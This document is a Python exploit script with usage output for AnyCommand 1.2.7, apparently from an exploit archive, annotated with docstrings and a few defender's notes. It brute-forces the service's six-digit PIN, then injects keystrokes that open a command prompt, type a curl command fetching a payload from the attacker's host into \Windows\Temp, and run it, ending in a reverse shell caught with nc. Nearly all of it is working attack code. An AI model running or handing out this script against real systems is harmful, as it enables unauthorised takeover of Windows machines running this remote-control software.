# Exploit Title: AnyCommand 1.2.7 - Remote Code Execution
# Date: 29/06/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://anycommand.io/
# Software Link: https://app.esigner.com/files/AnyCommandSetup/WSY-DLo0g/download
# Version: 1.2.7
# Tested on: Windows 10
'''
Description:
AnyCommand 1.2.7 contains critical vulnerabilities that let an unauthenticated
attacker achieve remote code execution. The exploit defeats the weak 6-digit
PIN authentication by brute force: the PIN space is only 1,000,000 values, and
in the run shown below the service was still answering after roughly 800,000
wrong guesses, so no lockout or throttling was observed. It then abuses the
command interface to simulate keystrokes for command execution and payload
delivery. This two-stage attack (PIN cracking followed by arbitrary command
execution) requires only network access to the vulnerable service and leads
to full system compromise.
usage:
python exp.py --bruteforce --host 192.168.8.105
[*] Bruteforcing PINs from 0 to 999999 (total: 1000000)
[*] Press Ctrl+C to stop
[>] Progress: 80.3% | Current PIN: 803429
[+] SUCCESS! Found PIN: 803477
[+] Use this PIN: --pin 803477
python exp.py --pin 803477 --lhost 192.168.8.100 --host 192.168.8.105
[*] Connected. Authenticating...
[✓] Authentication successful
[+] Payload executed. Waiting for connection...
[+] Exploit completed successfully
nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.8.105 50459
Microsoft Windows [Version 10.0.19045.5011]
(c) Microsoft Corporation. All rights reserved.
C:\\Users\\hack>
'''
import socket
import json
import time
import argparse
import sys
def send_line(sock, message):
    """Send *message* over *sock* as one newline-terminated line.

    The text is encoded with ``str.encode()``'s default codec and written
    with ``sendall``, so the call returns only once every byte is queued.
    """
    terminated = "".join([message, "\n"])
    sock.sendall(terminated.encode())
def send_text(sock, text, delay=0.05):
    """Send *text* one character at a time as individual protocol lines.

    ``:`` and ``&`` go out with the ``TYPE:`` prefix, a space goes out as
    ``KEY:space``, and every other character as ``KEY:<char>``. The function
    sleeps *delay* seconds after each character.
    """
    # Characters that are not sent as a plain KEY:<char> line.
    # NOTE(review): presumably ':' and '&' need TYPE: because they clash with
    # the protocol's own syntax; this file does not say.
    special_lines = {
        ':': "TYPE::",
        '&': "TYPE:&",
        ' ': "KEY:space",
    }
    for ch in text:
        send_line(sock, special_lines.get(ch, f"KEY:{ch}"))
        time.sleep(delay)
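def recv_quick(sock, timeout=1.0):
    """Read one chunk from *sock*, waiting at most *timeout* seconds.

    Returns up to 1024 bytes decoded to text (undecodable bytes are dropped)
    with surrounding whitespace stripped, or ``""`` if the read times out or
    fails.

    The socket is always left in blocking mode (timeout ``None``) afterwards,
    whatever timeout the caller had set before.
    """
    sock.settimeout(timeout)
    try:
        return sock.recv(1024).decode(errors='ignore').strip()
    except Exception:
        # Best-effort read: any socket failure counts as "no data". Catching
        # Exception rather than using a bare except lets KeyboardInterrupt
        # and SystemExit reach the caller instead of being swallowed here.
        return ""
    finally:
        sock.settimeout(None)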
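def try_pin(host, port, pin_str):
    """Check a single PIN against the service and report whether it was accepted.

    Opens a fresh TCP connection, waits for the server's greeting, then
    submits *pin_str* in two JSON shapes (``{"pin": ...}`` and
    ``{"auth": {"pin": ...}}``), one per line. Returns ``True`` as soon as a
    reply contains ``AUTH_SUCCESS``; returns ``False`` if there is no
    greeting, if neither shape is accepted, or on any connection error.

    Every call is a separate connection carrying one PIN, so the service sees
    each guess as a new short session. Whether it counts failures per source
    address is not visible from this file.
    """
    sock = None  # stays None if the socket cannot even be created
    try:
        sock = socket.socket()
        sock.settimeout(2.0)
        sock.connect((host, port))

        # No greeting means the peer is not speaking the expected protocol.
        if not recv_quick(sock):
            return False

        candidates = (
            json.dumps({"pin": pin_str}),
            json.dumps({"auth": {"pin": pin_str}}),
        )
        for payload in candidates:
            sock.sendall((payload + "\n").encode())
            if "AUTH_SUCCESS" in recv_quick(sock):
                return True
        return False
    except Exception:
        # Best-effort probe: any failure is reported as "not accepted".
        # Exception instead of a bare except keeps Ctrl+C (KeyboardInterrupt)
        # from being swallowed here.
        return False
    finally:
        # The original closed unconditionally, which raised if socket
        # creation itself had failed and left the name unbound.
        if sock is not None:
            sock.close()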
def bruteforce(host, port, start=0, end=999999):
    """Try every PIN from *start* to *end* inclusive and return the first hit.

    Each number is zero-padded to six digits and passed to ``try_pin``. A
    progress line is rewritten in place at most once every 0.5 seconds.
    Returns the accepted PIN as a string, or ``None`` if none was accepted or
    the run was interrupted with Ctrl+C.

    Defender's view: ``try_pin`` opens one connection per guess, so on the
    service side this is a long run of short connections from a single source,
    each ending in a failed authentication. A per-source attempt limit or a
    lockout would stop the enumeration long before the 1,000,000-value space
    is covered.
    """
    total = end - start + 1
    hit = None
    last_report = time.time()
    report_every = 0.5

    print(f"[*] Bruteforcing PINs from {start} to {end} (total: {total})")
    print("[*] Press Ctrl+C to stop")

    try:
        for attempt, candidate in enumerate(range(start, end + 1)):
            pin_str = f"{candidate:06d}"

            now = time.time()
            if now - last_report > report_every:
                progress = (attempt / total) * 100
                print(f"\r[>] Progress: {progress:.1f}% | Current PIN: {pin_str}", end='', flush=True)
                last_report = now

            if try_pin(host, port, pin_str):
                hit = pin_str
                print(f"\n[+] SUCCESS! Found PIN: {hit}")
                break
    except KeyboardInterrupt:
        print("\n[!] Bruteforce interrupted by user")

    # Printed after an interrupt as well, exactly as the original does.
    if not hit:
        print("\n[-] Bruteforce completed. No valid PIN found.")
    return hit
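def execute_payload(host, port, pin, lhost, payload):
    """Authenticate with a known PIN and drive the keystroke interface.

    Connects to the service, requires the greeting to be exactly
    ``AUTH_REQUIRED``, and submits *pin* in the same two JSON shapes that
    ``try_pin`` uses. After ``AUTH_SUCCESS`` it sends keystroke lines that
    open a command prompt, type a ``curl`` command fetching *payload* from
    *lhost* into ``\\Windows\\Temp``, and then type that file's path to run
    it. Returns ``True`` once the sequence has been sent, ``False`` on a
    wrong greeting, failed authentication or any error.

    The sequence is typed blind: the function never reads back whether the
    prompt opened or the download succeeded, so ``True`` only means the lines
    were sent.

    Defender's view: on the host this appears as a command prompt started in
    the interactive session, followed by ``curl`` writing an executable into
    ``\\Windows\\Temp`` and that file being launched. Both are practical
    detection points, independent of fixing the PIN weakness.
    """
    sock = None  # stays None if the connection itself fails
    try:
        sock = socket.create_connection((host, port), timeout=5)
        print("[*] Connected. Authenticating...")

        if recv_quick(sock) != "AUTH_REQUIRED":
            return False

        formats = [
            json.dumps({"pin": pin}),
            json.dumps({"auth": {"pin": pin}})
        ]

        for payload_format in formats:
            sock.sendall((payload_format + "\n").encode())
            response = recv_quick(sock)
            if "AUTH_SUCCESS" in response:
                print("[✓] Authentication successful")

                # Open a command prompt through simulated key presses. The
                # sleeps give the desktop time to react between steps.
                send_line(sock, "KEY:win")
                time.sleep(1)
                send_text(sock, "cmd", delay=0.5)
                time.sleep(1)
                send_line(sock, "KEY:enter")
                time.sleep(1)

                # Type the download command and submit it.
                download_cmd = f"curl {lhost}/{payload} -o \\Windows\\Temp\\{payload}"
                send_text(sock, download_cmd, delay=0.3)
                time.sleep(0.5)
                send_line(sock, "KEY:enter")
                time.sleep(1)

                # Type the downloaded file's path to run it.
                exec_cmd = f"\\Windows\\Temp\\{payload}"
                send_text(sock, exec_cmd, delay=0.3)
                time.sleep(0.5)
                send_line(sock, "KEY:enter")

                print("[+] Payload executed. Waiting for connection...")
                time.sleep(3)
                return True

        print("[-] Authentication failed")
        return False
    except Exception as e:
        print(f"[!] Error: {e}")
        return False
    finally:
        # The original closed unconditionally; when create_connection failed
        # the name was unbound and the cleanup raised, hiding the clean
        # False return.
        if sock is not None:
            sock.close()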
def main():
    """Parse the command line and run one of the two modes.

    ``--bruteforce`` enumerates PINs 0 to 999999 against ``--host``/``--port``
    and prints the one that was accepted. ``--pin`` together with ``--lhost``
    runs ``execute_payload`` with the given PIN. If neither mode is selected,
    or ``--pin`` is given without ``--lhost``, a message is printed and the
    process exits with status 1. ``--bruteforce`` takes precedence when both
    are given.
    """
    cli = argparse.ArgumentParser(description='AnyCommand Exploit by blue0x1(chokri hammedi) \n')
    cli.add_argument('--host', required=True, help='Target IP address')
    cli.add_argument('--port', type=int, default=8000, help='Target port')
    cli.add_argument('--lhost', help='Attacker IP for payload delivery')
    cli.add_argument('--payload', default='shell.exe', help='Payload filename')
    cli.add_argument('--pin', help='Specific PIN to try')
    cli.add_argument('--bruteforce', action='store_true', help='Bruteforce PIN')
    opts = cli.parse_args()

    # Mode 1: PIN enumeration only.
    if opts.bruteforce:
        recovered = bruteforce(opts.host, opts.port, 0, 999999)
        if recovered:
            print(f"[+] Use this PIN: --pin {recovered}")
        return

    # No mode selected.
    if not opts.pin:
        print("[-] Please specify either --pin or --bruteforce")
        sys.exit(1)

    # Mode 2: a known PIN also needs the delivery host.
    if not opts.lhost:
        print("[-] Please specify --lhost for payload delivery")
        sys.exit(1)

    succeeded = execute_payload(opts.host, opts.port, opts.pin, opts.lhost, opts.payload)
    if succeeded:
        print("[+] Exploit completed successfully")
    else:
        print("[-] Exploit failed")
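# Run the command-line entry point only when executed as a script. The stray
# "Data" fused onto the call in the scraped listing was page chrome, not code.
if __name__ == "__main__":
    main()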